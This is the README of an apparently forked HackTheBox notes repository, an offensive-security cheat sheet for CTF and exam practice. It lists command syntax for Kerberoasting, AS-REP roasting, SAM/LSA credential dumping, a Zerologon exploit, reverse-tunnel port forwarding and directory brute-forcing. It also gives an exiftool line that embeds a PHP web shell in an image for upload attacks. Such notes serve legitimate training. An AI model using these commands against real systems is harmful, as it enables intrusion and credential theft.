Skip to content
/ hackthebox-1 Public template
forked from dhaneshsivasamy07/hackthebox

Notes Taken for HTB Machines & InfoSec Community.

License

Notifications You must be signed in to change notification settings

0xFORK/hackthebox-1

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

hackthebox

License: MIT GitHub repo size

GitHub Repo stars GitHub forks GitHub watchers

Notes Taken for HTB Machine
Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams
Yet More to be updated

created & maintained by: cyberwr3nch

Contents

Commands Reference

File Contents
Active Directory Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet
Directory Enumeration gobuster, rustbuster, wfuzz, vhosts
File Transfer ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impackets
Nmap Nmap, PortScanning, Tags
Notes DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding
Password Cracking hashcat, john, hashexamples, zip file cracking
Post Exploitation current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic
Regular Commands ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch
Reverse Shells Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners
Web Attacks sql-injection, login bruteforce( wfuzz, hydra)
Docker Commands installation, building, pulling, updating, deleting, listing, cheatsheet
Git Commands clone, commit, push, pull, add, log, deleted file, checkout
Pivoting POST Exploitation, Pivoting, Chisel

Tools

Windows and Active Directory

Tool Use Command Syntax
Bloodhound.py BloodHound written in python. Used to obtain AD infromations from a windows machine python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all
Impackets Swiss Knife for most Windows AD attacks python GetNPUsers.py <domain_name>/ -usersfile <users_file> = ASREPRoasting
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> = Kerberoasting
Kerbrute A tool written in GO to enumerate AD users ./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file>
CredDump Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available ./pwdump.py <system hive> <sam hive> = Obtain Password Credentials
./cachedump.py <system hive> <sam hive> = obtain cached credentials
./lsadum.py <system hive> <sam hive> = Obtain LSA Dumps
PwdDump After getting the administrative access, running this will get the password hashes .\PwDump7.exe
ApacheDirectoryStudio LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine sudo ssh -L 389:172.20.0.10:389 lynik-admin@10.10.10.189

Port Forwarding

Tool Use Command Syntax
Chisel Used to forward a service running on a port in the victim machine ./chisel server -p <port no.> --reverse = on the attacker machine
./chisel client <attackerip:port> R:1234:127.0.0.1:1121 = Forwards the service running on port 1121 to the port 1234 on attackers machine
socat Swiss Knife for Port forwarding socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port> = Listens on every connection to port 8000 and forwards to the machineIP and its port
socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port> = forward all incoming requests to the port 9002 from to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services
plink SSH Putty in CLI mode .\plink.exe <user@host> -R <remote port>:<localhost>:<local port> .\plink.exe kali@10.10.14.32 -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888
ssh uses the built in ssh service to port forward a service Remote Port Forwarding:
> Command should be entered on the compromied machine
ssh <user@host> -R <host>:<port open in host>:<localhost>:<port in victim machine> -N -f
ssh cyberwr3nch@192.168.XX.XX -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f = Open the port 3000 in the cyberwr3nch's machine and forwards the service running in port 80 to the cyberwr3nch's 3000. So visiting 127.0.0.1:3000 in cyberwr3nch's browser will be the same of visiting 127.0.0.1:80 on the victim machine
================
Dynamic Port Forwarding:
> Command to be executed on the attacker machine
ssh -D <port on attacker machine> <victim@victim_machine>
ssh -D 1234 victim@192.168.XX.XX = Command to be executed on the attackers machine, the port 1234 should be configured in the /etc/proxychains.conf as socks4 127.0.0.1 1234. If SSH Dynamic port forwarding fails, go for chisel method
================
Local Port Forwarding:
> Command to be executed on the attacker machine
ssh -L 127.0.0.1:<port to req>:<internal ip>:<internal port> <intermediate_user@host>
ssh -L 127.0.0.1:8080:10.10.10.11:80 cyberwr3nch@10.10.10.10 = Whatever request to made to the attacker machine's port 8080 will travel through 10.10.10.10 and reach 10.10.10.11:80

Directory Enumeration

Tool Use Command Syntax
DirSearch Directory enumeration Tool python3 dirsearch.py -u <url> -e <extn>
Gobuster Directory enumeration tool written in GO gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>
RustBuster Direcotry Enumeration tool written in rust rustbuster dir -u <url> -w <wordlist> -e <extn>

Post Exploitation

Tool Use Command Syntax
LinEnum Post Enumeration scripts that automates enumeration ./LinEnum.sh
LinPeas Post Enumeration Script ./linpeas.sh
WinPEASbat/WinPEASexe Windows post enumeration script and exe .\winPEAS.bat

Misc

Tool Use Command Syntax
Exiftool Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension file.php.ext ./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>
Git Dumper Dump the Github repo if found in website ./git-dumper.py <website/.git> <output folder>
lxd-alpine builder When a victim machine is implemented with lxc the privesc is done with this article here
Php-reverse-shell Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell
ZerologonPOC CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. PS: Latest Version of Impackets is required python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\$@machineip
Gopherus SSRF with gopher:// protocol gophreus --exploit phpmemcache

SAY NO TO MSF !

Admired Bloggers

These are the urls that has the writeups for active and retired machines

nvm this

Constantly updating from MAY 3rd 2020

Thanks for visiting

A noob cyberwr3nch🔧 A member of TCSC Learn and Spread <3 xoxo💙

Support My contents

Dhanesh Sivasamy's Twitter

Releases

No releases published

Packages

No packages published

Languages

  • Python 68.5%
  • Shell 31.5%